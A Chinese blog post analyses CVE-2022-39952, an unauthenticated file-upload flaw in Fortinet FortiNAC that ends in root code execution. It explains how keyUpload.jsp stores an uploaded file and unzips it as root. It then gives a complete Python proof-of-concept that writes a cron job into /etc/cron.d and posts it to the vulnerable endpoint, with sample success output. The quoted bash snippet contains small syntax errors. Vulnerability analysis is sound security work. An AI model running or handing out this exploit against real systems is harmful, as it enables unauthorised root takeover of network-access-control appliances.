[漏洞分析]Fortinet FortiNAC CVE-2022-39952简析

最新推荐文章于 2024-07-06 23:32:35 发布
最新推荐文章于 2024-07-06 23:32:35 发布
阅读量736 收藏 12
点赞数 9
分类专栏: 漏洞分析 WEB安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46363249/article/details/136787709
版权

Fortinet FortiNAC CVE-2022-39952简析

一、影响版本

FortiNAC 9.4.0

FortiNAC 9.2.0 - 9.2.5

FortiNAC 9.1.0 - 9.1.7

FortiNAC 8.3 - 8.8

二、概况

Fortinet 在其安全公告中表示,他们在keyUpload scriptlet中发现了一个漏洞,该漏洞允许未经身份验证的用户将任意文件上传到系统。攻击者可能会滥用此漏洞来创建 cronjob 或向易受攻击的系统添加 SSH 密钥并获得对它们的远程访问权限。

三、利用CVE-2022-39952

该漏洞是名为“keyUpload.jsp”的文件引起的。

请添加图片描述

该 scriptlet 具有允许用户上传任意文件的功能。上传的文件保存到“ /bsc/campusMgr/config/upload.applianceKey ”。

File uploadedFile = new File("/bsc/campusMgr/config/upload.applianceKey");

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

然后,keyUpload.jsp 文件以 root 权限运行 bash 脚本来解压缩上传的文件。

Process prKey = rtKey.exec ("sudo /bsc/campusMgr/bin/configApplianceXml");

成功写入文件后,调用Runtime().Exec()执行位于 的 bash 脚本/bsc/campusMgr/bin/configApplianceXml。

#!/bin/sh

unalias cd 2> /dev/null
cd / 

VERSION='/bsc/campusMgr/bin/getPlatformVersion'
if [ "VERSION" == "0" ]
Then

echo "This script is not supported on this version of firmware"
exit;
fi

/usr/bin/unzip -o /bsc/campusMgr/config/upload.applianceKey

在这里插入图片描述

由于用户可以将任意文件上传到未经身份验证的端点,因此攻击者可以制作并上传恶意 zip 文件,这些文件可用于在易受攻击的系统中以 root 权限远程执行代码。例如,威胁行为者可能会在“/etc/cron.d”中添加一个 cronjob 来定期执行恶意命令,或者将 SSH 密钥添加到用户配置文件中以获得远程访问权限。

四、POC

python3 CVE-2022-39952.py --target x.x.x.x --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered

#!/usr/bin/python3
import argparse
import requests
import zipfile
import urllib3
urllib3.disable_warnings()


def exploit(target):
    url = f'https://{target}:8443/configWizard/keyUpload.jsp'
    r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False)
    if 'SuccessfulUpload' in r.text:
        print(f'[+] Payload successfully delivered')

def make_zip(payload_file):
    fullpath = '/etc/cron.d/payload'
    zf = zipfile.ZipFile('payload.zip', 'w')
    zf.write(payload_file, fullpath)
    zf.close()
    print(f'[+] Wrote {payload_file} to {fullpath}')

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-f', '--file', help='The cronjob payload file', required=True)
    args = parser.parse_args()

    make_zip(args.file)
    exploit(args.target)
鹏华李
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Fortinet FortiNAC RCE漏洞复现(CVE-2022-39952)
0xSec
05-17 2035
FortiNAC keyUpload 脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。
FORTINET-CORE-MIB.mib
03-14
FORTINET-CORE-MIB.mib 飞塔防火墙MIB原始文件,可通过MIB Browser文件进行解析,同时可通过SNMPWALK命令进行测试和调试。
Fortinet修复两个严重的RCE漏洞,其中一个两年前就发现?
smellycat000的专栏
02-20 1378
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全公司 Fortinet 发布安全更新,修复FortiNAC和FortiWeb 产品中的两个严重漏洞CVE-2022-39952CVE-2021-42756),它们可导致未认证攻击者执行任意代码或执行命令。第一个漏洞CVE-2022-39952影响FortiNAC,CVSS v3评分为9.8。FortiNAC 是一个网络访问控制解决方案...
飞塔防火墙常用命令集合
热门推荐
mq88560的博客
02-21 1万+
说明 CPU:系统管理、路由、新建会话、非FA2、NP2,NP4接口的流量处理等; 内存:运行系统软件,存储路由表、会话表、记录日志等; Flash卡:存放Fort IOS版本、配置文件,系统运行事件日志; CP芯片:内容处理芯片,病毒特征/IPS特征查找,IPSec VPN加解密等; FA2、NP2、NP4芯片:网络处理芯片,同步复制已建立的会话后,独立处理转发流量,减少CPU消耗。 ...
Fortinet SD-WAN Architecture .mp4
10-02
飞塔的SD-WAN培训录像,讲解了SD-WAN的整体架构和使用技巧; 希望了解Fortinet SD-WAN的朋友尽快下载哦。
FORTINET-FORTIGATE-MIB.mib
03-14
内容概要:飞塔防火墙 SNMP MIB文件 适合人群:运维、开发人员
Fortinet NSE5-FAZ-6.4 考试题库
03-30
飞塔 fortianalyzer 6.4版本考试题库,内容比较准确,以红色标注的答案为准,没有红色标注,则说明之前答案基本准确。
ztptool:ZTP工具有助于设置Fortinet Secure SD-WAN部署的零接触配置(ZTP)
05-11
ZTP工具ZTP工具是一个小型GUI应用程序,可帮助设置Fortinet FortiManager,以实现SD-WAN部署的零接触配置(ZTP)。 ZTP工具具有两个主要功能: 从Excel文件导入设备(已应用元数据,CLI模板,SD-WAN模板和策略包的...
网络安全测评技术与标准
weixin_48579910的博客
07-06 610
网络安全测评通过多种方法和工具对系统、网络和应用程序进行全面评估,以发现和修复潜在的安全漏洞,确保其符合安全标准和政策。结合渗透测试、漏洞扫描、安全审计、风险评估、合规性测试、代码审查、社会工程测试、配置评估和基准测试等多种类型的测评,组织可以全面提升其网络安全防护能力,保护其信息资产和业务连续性。网络安全测评流程包括准备阶段、信息收集阶段、漏洞扫描阶段、渗透测试阶段、安全审计阶段、风险评估阶段、报告阶段、修复和验证阶段以及持续监控和改进阶段。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 825
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
第一节 网络安全概述
最新发布
m0_74543941的博客
07-06 689
网络安全的概述笔记,详细了解网络安全的发展。
为什么需要做网络安全服务?
weixin_45840241的博客
07-02 349
网络安全服务之所以重要,是因为它在保护数字资产、维护企业运营、确保法规遵从、防范恶意行为以及建立信任等方面扮演着关键角色。综上所述,网络安全服务对于保护企业的无形和有形资产、确保业务连续性和法律遵从性、以及维持客户和员工的信任都是至关重要的。
网络安全概述
m0_64365018的博客
07-06 653
中国安全市场规模一直呈上升趋势,体量越来越大,增长率几乎未减少,市场容量几乎翻了一倍,互联网是一个开放式的环境人员众多其伴随的环境肯定也会更加复杂多变从而导致攻击频发,例如常见的勒索病毒、数据泄露、黑客入侵等网络安全事件层出不穷,接下来我将每种类型分别讲解。
等保2.0的具体技术要求有哪些重点?
w651428055的博客
07-04 640
等保2.0在技术层面的要求更为严苛与精细,旨在构建一个立体、多维、全方位的网络安全保护体系。企业和组织在实施等保2.0时,应当如同建筑师般精心设计,结合自身实际情况,绘制出详细的安全蓝图,不断提升网络安全防护能力,以应对日益复杂的网络安全挑战。同时,对环境的温湿度调控也提出了精准的要求,如同精心呵护珍贵植物的园丁,确保设备在适宜的环境中健康运转,避免数据因环境变幻而遭受损失。数据安全方面,要求实施数据分类、加密存储和传输、数据备份和恢复等措施,确保数据的保密性、完整性和可用性,如同对珍贵文献的保护和传承。
网络安全审计
weixin_48579910的博客
07-03 830
计算机信息系统安全保护能力的五个等级从自主保护到最高级别的监控保护,要求逐级递增。通过定期审计和评估,确保系统安全措施的有效实施和持续改进,可以有效保护系统免受各种安全威胁。网络安全审计机制和实现技术是确保计算机系统和网络环境的安全性、完整性和合规性的重要手段。通过系统地收集、分析和评估网络活动和系统日志,网络安全审计可以识别潜在的安全威胁和漏洞,并确保系统符合相关的安全标准和政策。以下是网络安全审计机制与实现技术的详细介绍。网络安全审计是确保信息系统安全的重要手段。
网络安全筑基篇——反序列化漏洞
weixin_55762309的博客
06-27 966
反序列化漏洞原理详解
AttackGen:一款基于LLM的网络安全事件响应测试工具
FreeBuf_的博客
07-03 1075
1、根据所选的威胁行为组织生成定制化的事件响应场景。2、允许指定组织的规模和行业,以实现定制化方案。3、根据MITRE ATT&CK框架,显示所选威胁行为组织使用的技术详细列表。4、根据选择的ATT&CK技术创建自定义场景。5、使用场景模板根据常见类型的网络事件快速生成自定义场景。6、AttackGen助手,可用于更新或询问有关生成场景的问题聊天界面。7、获取用户对生成场景质量的反馈。8、提供了可下载的Markdown格式场景。
游戏行业网络安全:挑战、防御与实践
@云安全小杜
07-04 377
随着游戏行业的迅猛发展,网络安全问题日益凸显,尤其是DDoS攻击、SQL注入、零日攻击等威胁,对游戏公司的运营安全和玩家体验造成了严重影响。本文将深入探讨游戏行业面临的网络安全挑战,并提出一系列实用的防御策略,包括代码实例,帮助游戏公司构建稳固的安全防线。DDoS攻击、SQL注入、零日攻击等各类威胁频发,不仅影响游戏性能,还可能泄露玩家隐私,甚至导致游戏公司面临经济损失和法律风险。此外,配置防火墙和入侵检测系统也是必要的。实施定期的安全审计和更新,以及使用最新的安全补丁,可以减少零日攻击的风险。
网络安全应急处理流程
weixin_48579910的博客
07-06 594
网络安全应急处理流程是一个系统化的过程,包括准备、识别、抑制、根除、恢复、事后分析和持续改进等阶段。通过制定详细的应急响应计划,组建应急响应团队,进行定期培训和演练,使用适当的工具和技术,组织可以有效应对网络安全事件,减少损失和影响,确保业务连续性和数据安全。持续改进和更新应急响应计划,是提升组织网络安全防护能力的关键。网络安全应急响应技术与工具在应急响应过程中发挥关键作用。
CVE-2022-40982
08-15
- *1* *2* *3* [CVE-2022-40684 Fortinet(飞塔)身份验证绕过漏洞](https://blog.csdn.net/qq_32261191/article/details/127614713)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鹏华李

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值